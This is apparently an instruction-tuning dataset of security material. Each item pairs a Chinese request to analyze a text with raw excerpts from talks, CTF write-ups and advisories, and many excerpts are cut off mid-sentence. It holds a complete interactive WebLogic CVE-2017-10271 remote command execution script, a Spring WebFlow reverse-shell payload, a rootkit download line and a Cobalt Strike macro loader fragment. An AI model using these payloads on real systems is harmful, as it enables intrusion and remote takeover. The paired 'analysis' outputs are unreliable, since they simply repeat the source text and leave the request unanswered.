6c 00 00 call 0x804f610 <fopen> 0x80489cc: 89 c6 mov esi, eax 0x80489ce: 89 34 24 mov dword [ esp ], esi 0x80489d1: e8 8a 87 00 00 call 0x8051160 <fgetc> 0x80489d6: 0f b6 c8 movzx ecx, al 0x80489d9: 81 f9 ff 00 00 00 cmp ecx, 0xff 0x80489df: 74 2c jz 0x8048a0d <get_flag+0x6d> 0x80489e1: 0f be c8 movsx ecx, al 0x80489e4: 66 0x80489e5: 66 0x80489e6: 66 0x80489e7: 2e 0x80489e8: 0f 1f 84 00 00 00 00 00 nop dword [ eax + eax * 0x0 + 0x0 ] 0x80489f0: 89 0c 24 mov dword [ esp ], ecx 0x80489f3: e8 a8 6d 00 00 call 0x804f7a0 <putchar> 0x80489f8: 89 34 24 mov dword [ esp ], esi 0x80489fb: e8 60 87 00 00 call 0x8051160 <fgetc> 0x8048a00: 0f be c8 movsx ecx, al 0x8048a03: 0f b6 c0 movzx eax, al 0x8048a06: 3d ff 00 00 00 cmp eax, 0xff 0x8048a0b: 75 e3 jnz 0x80489f0 <get_flag+0x50> 0x8048a0d: 89 34 24 mov dword [ esp ], esi 0x8048a10: e8 bb 67 00 00 call 0x804f1d0 <fclose> 0x8048a15: 83 c4 08 add esp, 0x8 0x8048a18: 5e pop esi 0x8048a19: c3 ret 0x8048a1a: 66 0x8048a1b: 0f 1f 44 00 00 ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n我的CS笔记之- In-memory Evasion 2 0x01 前言 内存逃逸的第二部分主要是作者讲诉CS的Payload的一个完整执行流程这个对理解CS植入体非常重 要对后面做免杀规避都起到很大作用第一部分讲侦测手法第二部分讲自身运行流程真的是知 己知彼这一部分作者先讲诉了Stager是什么然后讲述一个分段加载Payload的完整执行流程接着 就是不分段加载最后作者讲了进程注入相关技术在CS中的应用 0x02 分阶段payload和不分阶段payload 关于分不分阶段使用过CS的小伙伴应该都很清楚了但是里面的具体细节相信很多小伙伴也是一知 半解下面就详细说下分阶段Payload 分阶段的payload在进程中执行的流程 1. 申请一个块儿内存allocate memory 2. 复制Stager去这一块儿内存里 3. 创建一个线程运行这个Stager 4. 这个Stager会再次申请一块儿内存allocate memory 5. Stager去下载加密的payload写入申请的内存中 6. Stager把执行流程转递给这个加密的payload 7. 加密的payload自解密成Reflective DLL 8. 然后把执行流程传递给Reflective DLL 9. Reflective DLL 申请一个块儿内存allocate memory 10. 然后初始化自己在新的内存里面 11. 最后reflective DLL 调用payload的入口点函数 这就是一个分阶段的payload的完整加载流程如果你细细思考里面存在一个问题就是第7步被加密 的payload怎么自解密实际情况是这个所谓的被加密的payload分为2部分一部分是解密程序这个 是不加密的然后才是被加密的反射dll也就是Beacon.dll 从1-3是我们loader的执行3-6是Stager在内存中的执行7-8是加密payload的执行9-11是反射DLL 的执行 我们通过CS生成一个macro样本loader直观的感受下 loader Private Type PROCESS_INFORMATION hProcess As Long hThread As Long dwProcessId As Long dwThreadId As Long End Type Private Type STARTUPINFO cb As Long lpReserved As String lpDesktop As String lpTitle As String dwX As Long dwY As Long dwXSize As Long dwYSize As Long Author: L.N. / Date: 2021-09-07 Produced by AttackTeamFamily No. 1 / 7 - Welcome to www.red-team.cn dwXCountChars As Long dwYCountChars As Long dwFillAttribute As Long dwFlags As Long wShowWindow As Integer cbReserved2 As Integer lpReserved2 As Long hStdInput As Long hStdOutput As Long hStdError As Long End Type #If VBA7 Then Private Declare PtrSafe Function CreateStuff Lib \"kernel32\" Alias \"CreateRemoteThread\" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As LongPtr, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadID As Long) As LongPtr Private Declare PtrSafe Function AllocStuff Lib \"kernel32\" Alias \"VirtualAllocEx\" (ByVal hProcess As Long, ByVal lpAddr As Long, ByVal lSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr Private Declare PtrSafe Funct", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMoreFind 款于快速导出URLDomain和IP的具 快速安装 式: 通过Go包管理安装 式: 直接安装进制件 式三: 本地编译 法说明 1)帮助信息 go install github.com/mstxq17/MoreFind@latest wget --no-check-certificate https://ghproxy.com/https://github.com/mstxq17/MoreFind/releases/download/v1.0.2/MoreFi nd_1.0.2_`uname -s`_`uname -m`.tar.gz tar -xzvf MoreFind_1.0.2_`uname -s`_`uname -m`.tar.gz sudo mv ./MoreFind /usr/bin/MoreFind && chmod +x /usr/bin/MoreFind git clone https://github.com/mstxq17/MoreFind.git chmod +x ./build.sh && ./build.sh MoreFind -h 2)导出URL 3)导出域名 4)导出ip 5)持导出结果 TODO 1)优化代码逻辑和结构 2)输出结果动去重复 MoreFind -u MoreFind -d MoreFind -i MoreFind -u -d -i -o result.txt 3)完善脚本异常处理部分 4)加部分URL智能去重代码 5)完善Log输出处理 6)实现动强制更新", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Spring WebFlow 远程代码执行漏洞CVE-2017-4971 Spring WebFlow 是一个适用于开发基于流程的应用程序的框架如购物逻辑可以将流程的定义和实现流程行为的类和视图分离开来在其 2.4.x 版本中如果我们控制了数据绑定时的field将导致一个SpEL表达式注入漏洞最终造成任意命令执行 参考链接 - https://threathunter.org/topic/593d562353ab369c55425a90 - https://pivotal.io/security/cve-2017-4971 ## 测试环境 运行测试环境 ``` docker compose up -d ``` 等待环境启动后访问`http://your-ip:8080`将看到一个酒店预订的页面这是spring-webflow官方给的简单示例 ## 漏洞复现 首先访问`http://your-ip:8080/login`用页面左边给出的任意一个账号/密码登录系统 ![](1.png) 然后访问id为1的酒店`http://your-ip:8080/hotels/1`点击预订按钮Book Hotel填写相关信息后点击Process从这一步其实WebFlow就正式开始了 ![](2.png) 再点击确认Confirm ![](3.png) 此时抓包抓到一个POST数据包我们向其中添加一个字段也就是反弹shell的POC ``` _(new java.lang.ProcessBuilder(\"bash\",\"-c\",\"bash -i >& /dev/tcp/10.0.0.1/21 0>&1\")).start()=vulhub ``` ![](4.png) 注意别忘记URL编码 成功执行获得shell ![](5.png)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nB O S S E E R I K S O N / B I T S E C < B O S S E . E R I K S S O N @ B I T S E C . S E > Runtime Kernel Patching on Mac OS X Defcon 17, Las Vegas Who am I?  Bosse Eriksson  Security Consultant / Researcher at Bitsec  Unhealthy fetish for breaking stuff  Recently been looking into Mac OS X rootkit techniques Agenda  Intro  What is a rootkit?  OS X? BSD? XNU?  Runtime kernel patching  Runtime kernel patching on OS X  PoC runtime kernel patching rootkit for OS X  Rootkit detection  References  Q&A What is a rootkit?  Program for access retention  Local / remote backdoors  Typically requires root access  NOT an exploit or a trojan horse  Stealth  Hides files/processes/sockets  Types of rootkits  Userspace  Easy to implement  Easy to discover  Kernelspace  Hard(er) to implement  Much harder to detect if done properly Pwning  Simple Illustration  This is when you get pwned (exploit) $ ./0day h mail.doxp*ra.com - connecting - exploiting % uname a; id FreeBSD living*nd.org 7.0-STABLE FreeBSD 7.0-STABLE #0: Mon Jul 28 18:18:06 PDT 2008 psm@pmjm.com:/usr/obj/usr/src/sys/GENERIC i386 uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)  and this is when you stay pwned (rootkit) % wget http://attackerhost/rootkit > /dev/null ; chmod +x rootkit % ./rootkit -i Rootkit examples  Userspace  Various evil patches to ls/netstat/ps etc  Also binary patches  Kernelspace  Phalanx by rebel  Runtime kernel patching rootkit for Linux 2.6  Uses /dev/mem to patch kernel memory and hook syscalls  SucKIT by sd  Runtime kernel patching rootkit for Linux 2.4 (SucKIT 2 for Linux 2.6)  Uses /dev/kmem to patch kernel memory and hook syscalls  Knark by Creed  LKM for Linux 2.2  Hooks syscalls  WeaponX by nemo  Kernel module (KEXT) for OS X < 10.3  First public OS X kernel rootkit OS X? BSD? XNU?  XNU is the kernel of the OS X operating system  Built on both BSD and Mach technology  BSD layer  Networking  Processes  POSIX API and BSD syscalls    Mach layer  Kernel threads  Interrupts  Memory manageme", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1200 EIGHTEENTH STREET, NW WASHINGTON, DC 20036 TEL 202.730.1300 FAX 202.730.1301 WWW.HARRISWILTSHIRE.COM ATTORNEYS AT LAW March 14, 2007 Via Electronic Filing Ms. Marlene H. Dortch, Secretary Federal Communications Commission 445 12th Street, SW Washington, DC 20554 Re: Notice of Ex Parte Communication, ET Docket Nos. 04-186, 02-380 Dear Ms. Dortch: On March 13, 2007, on behalf of a coalition that includes Dell, Inc., Google, Inc., the Hewlett- Packard Co., Intel Corp., Microsoft Corp., and Philips Electronics North America Corp., Srihari Narlanka of Microsoft; William Brown and John Clark, outside consultants to Microsoft; and Edmond Thomas and S. Roberts Carter of Harris, Wiltshire & Grannis LLP submitted a prototype TV band device to the FCC Laboratory for testing. The above-named individuals also met with Rashmi Doshi, Steven Jones, and Steven Martin of the Office of Engineering and Technology to provide instruction on the operation of the device. On March 14, 2007, Messrs. Thomas, Narlanka, Brown, and Clark met with Messrs. Doshi and Jones as well as Thomas Phillips of the OET staff to discuss further the operation of the device. In addition, the Coalition provided OET staff with a copy of the device manual, attached hereto. Pursuant to the Commissions rules, a copy of this notice is being filed electronically in the above-referenced dockets. If you require any additional information please contact the undersigned at (202) 730-1305. Sincerely yours, /s/ Edmond J. Thomas Edmond J. Thomas Senior Policy Advisor HARRIS, WILTSHIRE & GRANNIS LLP Marlene H. Dortch March 14, 2007 Page 2 cc: Julius Knapp Rashmi Doshi Steven Jones Steven Martin Thomas Phillips Microsoft TV White Spaces Development Platform Version 1 Microsoft Microsoft TV White Spaces Development Platform Microsoft Microsoft TV White Spaces Development Platform Microsoft Corporation Srihari Narlanka One Microsoft Way Redmond, WA 98052 (425) 703-8661 sriharin@microsoft.com  2007 Microsoft Corporation. Al", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nfrom __future__ import print_function from builtins import input import requests import sys url_in = sys.argv[1] payload_url = url_in + \"/wls-wsat/CoordinatorPortType\" payload_header = {'content-type': 'text/xml'} def payload_command (command_in): html_escape_table = { \"&\": \"&amp;\", '\"': \"&quot;\", \"'\": \"&apos;\", \">\": \"&gt;\", \"<\": \"&lt;\", } command_filtered = \"<string>\"+\"\".join(html_escape_table.get(c, c) for c in command_in)+\"</string>\" payload_1 = \"<soapenv:Envelope xmlns:soapenv=\\\"http://schemas.xmlsoap.org/soap/envelope/\\\"> \\n\" \\ \" <soapenv:Header> \" \\ \" <work:WorkContext xmlns:work=\\\"http://bea.com/2004/06/soap/workarea/\\\"> \\n\" \\ \" <java version=\\\"1.8.0_151\\\" class=\\\"java.beans.XMLDecoder\\\"> \\n\" \\ \" <void class=\\\"java.lang.ProcessBuilder\\\"> \\n\" \\ \" <array class=\\\"java.lang.String\\\" length=\\\"3\\\">\" \\ \" <void index = \\\"0\\\"> \" \\ \" <string>cmd</string> \" \\ \" </void> \" \\ \" <void index = \\\"1\\\"> \" \\ \" <string>/c</string> \" \\ \" </void> \" \\ \" <void index = \\\"2\\\"> \" \\ + command_filtered + \\ \" </void> \" \\ \" </array>\" \\ \" <void method=\\\"start\\\"/>\" \\ \" </void>\" \\ \" </java>\" \\ \" </work:WorkContext>\" \\ \" </soapenv:Header>\" \\ \" <soapenv:Body/>\" \\ \"</soapenv:Envelope>\" return payload_1 def do_post(command_in): result = requests.post(payload_url, payload_command(command_in ),headers = payload_header) if result.status_code == 500: print(\"Command Executed \\n\") else: print(\"Something Went Wrong \\n\") print(\"***************************************************** \\n\" \\ \"**************** Coded By 1337g ****************** \\n\" \\ \"* CVE-2017-10271 Blind Remote Command Execute EXP * \\n\" \\ \"***************************************************** \\n\") while 1: command_in = input(\"Eneter your command here: \") if command_in == \"exit\" : exit(0) do_post(command_in)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHacking Internet Kiosks Paul Craig Defcon 16  Las Vegas  Who am I?  Paul Craig  Principal Security Consultant.  Security-Assessment.com, Auckland, NEW ZEALAND!  Application Penetration Tester.  Devoted Hacker  Shameless Alcoholic  Email: paul.craig@security-assessment.com  www: http://www.security-assessment.com Overview  Kiosks 101  What is an Internet Kiosk.  Kiosk Software Security Model.  Hacking Internet Kiosks  Vulnerabilities in the Kiosk Security Model.  Kiosk Hacking Techniques.  Tool Release: iKAT : interactive Kiosk Attack Tool.  iKAT Officially Released at Defcon 16!  Hack any internet Kiosk in seconds.  Live Demos: Hacking Internet Kiosks with iKAT. Overview What Is An Internet Kiosk  16 Months Ago I Was Sitting in an Airport.  8 hour stop over in Hong Kong.  Queue of 3-4 people waiting to use an Internet Kiosk.  Damn, that internet kiosk sure is popular  I wonder if I could hack it. Lemon party the airport.?  Why do I never hear about new methods of Kiosk hacking?  Kiosks are popular, but rarely appear in security publications.  Popularity + Poor Security Visibility = Good Attack Target  New Security Research Goal:  Find Every Possible Method Of Hacking an Internet Kiosk.  Become the Kiosk of Internet Kiosk Hacking! What Is An Internet Kiosk  Kiosks are Real Popular.  Internet Kiosks Found in : Airports, Train stations, Libraries, DVD Rental Stores, Corporate Building Lobbies, Convenience Stores, Post Office, Cafés. What Is An Internet Kiosk  Initial Kiosk Observations:  Hardware:  Kiosks installed in a custom hard-shell case.  Lack of physical access to the computer case.  Input devices restricted (Floppy/DVD/USB/FireWire inaccessible).  Kiosk is securely bolted to the ground, padlocked.  Machine/Cash Box access through Abloy lock. What Is An Internet Kiosk  Software.  Majority of Kiosks run commercial Kiosk software on Windows.  Linux based Kiosks exist, but Windows is more popular.  44 different commercial Kiosk products on the market.  Marketed as ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nfrom math import sqrt def fail(memes, calcium): dank = True if calcium < memes: if memes % calcium == 0: dank = False else: wew = fail(memes, calcium + 1) dank = wew return dank def epicfail(memes): if memes > 1: if dank(memes, 2): return 1 + bill(memes - 1) else: return such(memes - 1) return 0 def dootdoot(memes, seals): if seals <= memes: if seals == 0: return 1 else: if seals == memes: return 1 else: return dootdoot(memes - 1, seals - 1) + dootdoot(memes - 1, seals) def such(memes): wow = dootdoot(memes, 5) if wow % 7 == 0: wew = bill(memes - 1) wow += 1 else: wew = epicfail(memes - 1) wow += wew return wow def brotherman(memes): hues = 0 if memes != 0: if memes < 3: return 1 else: wew = brotherman(memes - 1) hues = wew wew = brotherman(memes - 2) hues += wew return hues % 987654321 def bill(memes): wow = fibonacci_mod_987654321(memes) if wow % 3 == 0: wew = such(memes - 1) wow += 1 else: wew = epicfail(memes - 1) wow += wew return wow def me(): memes = 13379447 wew = epicfail(memes) print(wew) me()", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDiscovering and Triangulating Rogue Cell Towers Eric Escobar, PE Security Engineer Reddit: jaycrew A bit about me:  Started off in Civil Engineering (MS, PE)  Always loved computers  Nerded out on all things wireless  Licensed HAM  I love to automate things  Chicken coop  Sprinklers  Caught the DEF CON bug  Wireless CTF A bit about what I do:  Security Engineer for Barracuda Networks  Incident Response  Pentesting  Red Team, Blue Team  Social Engineering  Phishing Campaigns  Bug bounty  Infrastructure scanning  Product team relations  2FA, IPAM Heres what we are going to cover:  What is a rogue cell tower?  Why should you care about rogue cell towers?  How can you detect a rogue cell tower?  How do you find a rogue cell tower?  How do you build a detector at home?  Youve detected a rogue tower now what? What is a rogue cell tower?  A device created (or purchased) by companies, governments or hackers that has the ability to trick your phone into thinking its a real cell phone tower.  Also known as IMSI catchers, interceptors, cell-site simulators, Stingrays, and probably a few more.  Rogue cell towers have the ability to collect information about you indirectly through metadata (call length, dialed numbers)  In some conditions can collect content of messages, calls, and data. How are cell simulators used today? In the United States:  IMSI-catchers are used by US law enforcement agencies to help locate, track, and collect data on suspects.  ACLU has identified 66 agencies and 24 states that own stingrays.  Used to monitor demonstrations in the US  Used in Chicago political protests  IMSI Catcher Counter-Surveillance Freddy Martinez  Its possible to make an IMSI-catcher at home  DEFCON 18: Practical Cellphone Spying - Chris Paget How are cell simulators used today? Further reading:  EFF.org  Cell-site simulator FAQ  ACLU  Stingray Tracking Devices: Whos Got Them How are cell simulators used today? Abroad:  Reported use in Ireland, UK, China, Germany, Norway, South Afri", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTrojan-tolerant Hardware & Supply Chain Security in Practice Who we are Vasilios Mavroudis Doctoral Researcher, UCL Dan Cvrcek CEO, Enigma Bridge George Danezis Professor, UCL Petr Svenda CTO, Enigma Bridge Assistant Professor, MUni Highlights  HSMs & Shortcomings  Existing Solutions  Lessons learned from airplanes  Hardware Prototype  Crypto Protocols  Attack-Defense Demo  Politics, Distrust & Hardware Security Hardware Security Modules Physical computing device that safeguards and manages digital keys for strong authentication and provides cryptoprocessing. Applications:  Cryptographic key generation, storage, management  Sensitive data handling and storage  Application servers offloading Crypto Operations are carried out in the device No need to output the private keys! HSM Threat Model Common Use cases: PKIs, Card payment systems, SSL connections, DNSSEC, &Transparent Data Encryption for Databases Certified to Common Criteria or FIPS 140:  Anti-Tampering Protection  Strong Random Number Generator  Cryptographic key management  Bugs  Errors  Backdoors/HT CVE-2015-5464 The HSM allows remote authenticated users to bypass intended key-export restrictions  Existing Solutions  Trusted Foundries Very expensive Prone to errors  Split-Manufacturing Still Expensive Again prone to errors Not 100% secure  Post-fabrication Inspection Expensive A huge pain, doesnt scale  Secret-sharing Keys generated by a trusted party Only for key storage Alternative approaches? A solution from the sky (not the cloud) Lockstep systems are fault-tolerant computer systems that run the same set of operations at the same time in parallel.  Dual redundancy allows error detection and error correction  Triple redundancy automatic error correction, via majority vote  Triple Redundant 777 Primary Flight Computer Not so fast  Fault-tolerant systems are built for safety  The computations are simply replicated  The majority vote part is using a trusted IC Not enough for security! Redundancy for security", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n'\\\" t .TH \"LOCALE\\&.CONF\" \"5\" \"\" \"systemd 231\" \"locale.conf\" .\\\" ----------------------------------------------------------------- .\\\" * Define some portability stuff .\\\" ----------------------------------------------------------------- .\\\" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ .\\\" http://bugs.debian.org/507673 .\\\" http://lists.gnu.org/archive/html/groff/2009-02/msg00013.html .\\\" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ .ie \\n(.g .ds Aq \\(aq .el .ds Aq ' .\\\" ----------------------------------------------------------------- .\\\" * set default formatting .\\\" ----------------------------------------------------------------- .\\\" disable hyphenation .nh .\\\" disable justification (adjust text to left margin only) .ad l .\\\" ----------------------------------------------------------------- .\\\" * MAIN CONTENT STARTS HERE * .\\\" ----------------------------------------------------------------- .SH \"NAME\" locale.conf \\- 本地化(locale)配置文件 .SH \"SYNOPSIS\" .PP /etc/locale\\&.conf .SH \"描述\" .PP /etc/locale\\&.conf 文件用于 全系统范围的本地化(locale)设置此文件会在系统启动的早期阶段被 \\fBsystemd\\fR(1) 读取 .PP locale\\&.conf 文件的基本格式 是一系列换行符分隔的 VAR=VALUE 行(每行一个变量) 可以直接嵌入到 shell 脚本中使用 注意此文件并不支持变量替换之类的任何高级 shell 特性 以便于应用程序无须支持这些高级 shell 特性 即可直接使用此文件 .PP 注意下列内核引导选项 \\fIlocale\\&.LANG=\\fR, \\fIlocale\\&.LANGUAGE=\\fR, \\fIlocale\\&.LC_CTYPE=\\fR, \\fIlocale\\&.LC_NUMERIC=\\fR, \\fIlocale\\&.LC_TIME=\\fR, \\fIlocale\\&.LC_COLLATE=\\fR, \\fIlocale\\&.LC_MONETARY=\\fR, \\fIlocale\\&.LC_MESSAGES=\\fR, \\fIlocale\\&.LC_PAPER=\\fR, \\fIlocale\\&.LC_NAME=\\fR, \\fIlocale\\&.LC_ADDRESS=\\fR, \\fIlocale\\&.LC_TELEPHONE=\\fR, \\fIlocale\\&.LC_MEASUREMENT=\\fR, \\fIlocale\\&.LC_IDENTIFICATION=\\fR 可用于覆盖此文件中的设置 .PP /etc/locale\\&.conf 中的设置是全系统范围的默认设置 会被每一个单元与用户继承 除非之后又被某个进程或用户刻意修改 .PP 在某些发行版上如果该文件不存在 可能还会到其他位置去寻找 这取决于个别发行版自己的设置 .PP 可以使用 \\fBlocalectl\\fR(1) 在运行时修改此文件的内容 可以使用 \\fBsystemd-firstboot\\fR(1) 初始化已挂载(但未启动)的系统镜像的本地化(locale)设置 .SH \"选项\" .PP 可以在 /etc/locale\\&.conf 中使用 \\fILANG=\\fR, \\fILANGUAGE=\\fR, \\fILC_CTYPE=\\fR, \\fILC_NUMERI", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Heap overflow Binary Exploitation, 450 points ## Description: > Just pwn this using a heap overflow taking advantage of douglas malloc free program and get a flag. ```c #include <stdlib.h> #include <stdio.h> #include <string.h> #define FLAGSIZE 128 void win() { char buf[FLAGSIZE]; FILE *f = fopen(\"flag.txt\",\"r\"); fgets(buf,FLAGSIZE,f); fprintf(stdout,\"%s\\n\",buf); fflush(stdout); } int main(int argc, char *argv[]) { char *fullname, *name, *lastname; fullname = malloc(666); name = malloc(66); lastname = malloc(66); printf(\"Oops! a new developer copy pasted and printed an address as a decimal...\\n\"); printf(\"%d\\n\",fullname); printf(\"Input fullname\\n\"); gets(fullname); printf(\"Input lastname\\n\"); gets(lastname); free(fullname); puts(\"That is all...\\n\"); free(name); free(lastname); exit(0); } ``` Hints: * https://www.win.tue.nl/~aeb/linux/hh/hh-11.html ## Solution: This is an artificial example taken from [Secure Coding in C and C++](https://www.amazon.com/Secure-Coding-2nd-Software-Engineering/dp/0321822137). A complete analysis of the example exists in the book (section 4.6, Doug Lea's Memory Allocator, a.k.a. `dlmalloc`), and this writeup is inspired by it. The vulnerability here is a classic *heap overflow*, caused by an unbound read to a heap buffer: `gets(fullname)`. Using this vulnerability, it is possible to write a DWORD to an arbitrary memory location. In order to understand how this is done, we need to understand the `dlmalloc` heap. In this heap implementation, the heap is divided into chunks. When a user calls `malloc`, the heap manager allocates a chunk and returns it to the user. However, the address that `malloc` returns isn't the beginning of the chunk - there is some metadata before it. This is how a heap chunk looks like when it is allocated: ``` +------------------------+---+ | Size of chunk | P | Pointer returned by malloc --> +------------------------+---+ | User Data | | | | | | | | | +----------------------------+ ``` The size of the chunk is sa", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nLadar Levison Stephen Watt What is Dark Mail? What is Dark Mail? What is DIME? Did you write down the formula? Dark Internet Mail Environment DIME Illustrated User Client DARPA NET DMAP DMTP Resolver Transport Signet Service Global Ledger (Optional) Dark Messages Server ] ] Signets Signets DNS Why Do We Need It?  Guilt by Association  Mass Surveillance (Gotta Love Backbone Slurping)  Service Provider (PRTT Orders, Search Warrants, NSLs, FISC Warrants) Goals  Message Confidentiality  Author Validation  Minimize Metadata Exposure  Automagical Key Management  Efficient Access from Multiple Clients  Deployment Flexibility Get everyone using it! The more people using it, the more valuable it becomes. How far will they go? How will they attack? Weak Points  DNS  Password Strength  Endpoint Security  Cryptographic Algorithms  Implementation Vulnerabilities  JavaScript Clients  For those addicted to Webmail * Warning: if the world adopts end-to-end cryptography for communications, then its only a matter of time  hardware will start shipping from the factory with a backdoor. Lets Get Back to DIME Lead by Example DIME Management Record DIME Management Record DIME Management Record What is a Signet? Signet Header Byte 1: Signet Format Version Number Bytes 2-4: Length of the Signet (minus the 4 byte header) Defined Attributes Byte 1: Attribute Type (Signing key, Encryption Key, Org Signature, Etc.) Bytes 2-3: Value Length Bytes 4-X: Value Undefined Attributes Byte 1: Indicates Undefined Attribute Type (Value == 255) Byte 2: Name Length Bytes 3-N: Name Bytes (N+1)-(N+3): Value Length Bytes (N+4)-(N+4+X): Value * Because the overall length is 3 bytes, the maximum size of a Signet is 16 megabytes. Signet Construction Signet Construction Signet Construction Signet Construction Signet Construction Signet Construction Trust Model Signet resolver obtains a signet from an authoritative primary source and then validates it using a pre-authenticated secondary source. User Signet Org Sign", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Data Science 3 Category: Data Science, 200 points ## Description See [Data Science 1](Data_Science_1.md). ## Solution: For this flag, we'll look for the largest internal clique of hosts. In other words, we're searching for the largest \"sub-network\" in our corporation where all hosts are communicating with each other. We'll use the reference code from [here](https://www.kaggle.com/hawkcurry/data-analysis-for-network-security-101-solution) to identify the clique. ```python import networkx from networkx.algorithms.approximation.clique import large_clique_size from collections import Counter internal_edges_all = df[ df['src_int'] & df['dst_int'] ].drop_duplicates(['src_ip', 'dst_ip', 'dst_port']) internal_ports = internal_edges_all.dst_port.unique() port_upper_bounds = [] for p in internal_ports: internal_edges = internal_edges_all\\ .pipe(lambda x: x[x['dst_port'] == p])\\ .drop_duplicates(['src_ip', 'dst_ip']) edges = set() for l, r in zip(internal_edges.src_ip, internal_edges.dst_ip): k = min((l, r), (r, l)) edges.add(k) degrees = Counter() for (l, r) in edges: degrees[l] += 1 degrees[r] += 1 max_clique_size = 0 min_degrees = len(degrees) for idx, (node, degree) in enumerate(degrees.most_common()): min_degrees = min(min_degrees, degree) if min_degrees >= idx: max_clique_size = max(max_clique_size, idx+1) if min_degrees < max_clique_size: break port_upper_bounds.append((p, max_clique_size + 1)) max_port = 0 curr_max_clique = 0 max_clique_G = None for p, max_clique_upper_bound in port_upper_bounds: if curr_max_clique > max_clique_upper_bound: break internal_edges = internal_edges_all\\ .pipe(lambda x: x[x['dst_port'] == p])\\ .drop_duplicates(['src_ip', 'dst_ip']) internal_nodes = set(internal_edges.src_ip) | set(internal_edges.dst_ip) G = networkx.Graph() G.add_nodes_from(internal_nodes) for l, r in zip(internal_edges.src_ip, internal_edges.dst_ip): G.add_edge(l, r) _size = large_clique_size(G) if curr_max_clique < _size: curr_max_clique = _size max_port = p max_clique_", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAdam Donenfeld  Android chipsets overview in ecosystem  Qualcomm chipset subsystems overview  New kernel vulnerabilities  Exploitation of a new kernel vulnerability  Conclusions ADAM DONENFELD  Years of experience in research (both PC and mobile)  Vulnerability assessment  Vulnerability exploitation  Senior security researcher at Check Point  In meiner Freizeit, lerne ich Deutsch gern Special thanks to Avi Bashan, Daniel Brodie and Pavel Berengoltz for helping with the research OEM Chipset code Android Open Source Project Linux Kernel Qualcomm IPC Router GPU Thermal QSEECOM Performance Audio Ashmem IPC Router GPU Thermal Performance CVE-2016-5340  Ashmem  Androids propriety memory allocation subsystem  Qualcomm devices uses a modified version  Simplifies access to ashmem by Qualcomm modules int get_ashmem_file(int fd, struct file **filp, struct file **vm_file, unsigned long *len) { int ret = -1; struct ashmem_area *asma; struct file *file = fget(fd); if (is_ashmem_file(file)) { asma = file->private_data; *filp = file; *vm_file = asma->file; *len = asma->size; ret = 0; } else { fput(file); } return ret; } Is our fd an ashmem file descriptor? CVE-2016-5340  Obtain a file struct from file descriptor  Compare file operation handlers to expected handler struct  If it matches file type is valid static int is_ashmem_file(struct file *file) { char fname[256], *name; name = dentry_path(file->f_dentry, fname, 256); return strcmp(name, \"/ashmem\") ? 0 : 1; /* Oh my god */ } CVE-2016-5340  Exploitation requires   Creation of file named ashmem on root mount point (/)  / is read-only CVE-2016-5340  Opaque Binary Blob  APK Expansion File  Support APKs > 100MB  Deprecated (still works!)  A mountable file system CVE-2016-5340  Create an OBB  Create ashmem in its root directory  Mount the OBB  Map ashmem memory to the GPU  Pass a fd to the fake ashmem file Ashmem IPC Router GPU Thermal Performance CVE-2016-2059  Qualcomms IPC router  Special socket family  AF_MSM_IPC (27)  Unique feat", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nC.R.E.A.M. C.R.E.A.M.  Cache Rules Evidently Cache Rules Evidently Ambiguous, Misunderstood Ambiguous, Misunderstood Jacob Thompson Security Analyst Independent Security Evaluators jthompson@securityevaluators.com Payroll Statement from ADP  Name  Address  Last four of SSN  Last four of bank acct. Prescription Claims from Argus  Name  Medication names and dosages Credit Report from Equifax  Name  Credit score  Credit report Types of Cached Sensitive Data  Name  Postal Address  Email Address  Phone Number  Date of birth  Last 4 digits of SSN  Bank account numbers  Check images  Credit card account numbers  Stock positions and balances  Insurance policy numbers, amounts  VINs  Life insurance beneficiaries  Medical prescriptions Reliably Prevent Disk Caching  Use two HTTP headers (not meta tags):  Pragma: no-cache  IE 8 and earlier with HTTP/1.0 servers  Cache-Control: no-store  All other cases How to Fail at Preventing Caching  Cache-Control: no-cache  Not standard  Works in IE 4-9  Broken in IE 10  Pragma: no-cache  Only works in IE  Cache-Control: private  Not for browsers  Cache-Control in meta tags  Not recognized in any browser  Cache-Control with HTTP/1.0  Broken in IE 4-8 History of Disk Caching Policies  Never cache HTTPS  Netscape 1, 